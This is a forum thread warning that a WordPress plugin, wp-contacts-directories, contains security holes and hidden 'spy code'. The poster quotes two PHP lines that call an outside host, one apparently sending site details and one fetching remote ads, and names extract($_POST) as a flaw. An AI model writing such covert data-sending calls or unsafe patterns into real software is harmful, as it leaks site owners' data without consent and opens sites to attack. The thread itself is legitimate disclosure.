Skip to:
Content
Pages
Categories
Search
Top
Bottom

Security warning


  • danbpfr
    Participant

    @chouf1

    Hi BP people,

    i want to warn you against wp-contacts-directories plugin. This plug is recently updated and works with WP and WPMU/BP…. If you already use it, uninstall it.

    If you know what you do, take care of it because this plugin contains many security holes (for ex. extract($_POST);…) and a spy code line 556 to 562 who contains something like this:

    $res = file_get_contents("http://ahlul.web.id/tools/plugcheck/?n=$n&h=$h&m=$e");

    in another if statement, line 577, we find :

    $output = file_get_contents("http://ahlul.web.id/tools/plugads/wpcontact.php");

    This is illegal as far as i know…

    Anyway this is a perfect example of what not to do in matter of security, php and open source coding.

    Of course i also post this on the WP forum.

    http://wordpress.org/support/topic/379688

Viewing 4 replies - 1 through 4 (of 4 total)

  • Hugo Ashmore
    Keymaster

    @hnla

    Hmm available for all in the main WP plugin repository, this is what’s not great about all and sundry banging out plugins without any apparent checks in place, most users haven’t a clue what they are installing really.

    Think it’s been mentioned in general before but there really needs to be a sanctioned, vetted, approved plugin repository where at least users can be directed and assured of reasonable security then it’s a case of install plugins from elsewhere and on your own head be it.


    danbpfr
    Participant

    @chouf1

    I am very surprised at the lack of feedback from the community to this kind of warning ! What a deafening silence…


    Hugo Ashmore
    Keymaster

    @hnla

    It’s an odd response.. or lack of

    I’d kind of like to hear that a project that is getting as mature as WP (this isn’t really a BP issue after all) would be considering this aspect of plugin authoring and placing some form of control or seal of approval on certain plugins


    peterverkooijen
    Participant

    @peterverkooijen

    Thanks for the warning!

Viewing 4 replies - 1 through 4 (of 4 total)
  • The topic ‘Security warning’ is closed to new replies.
Skip to toolbar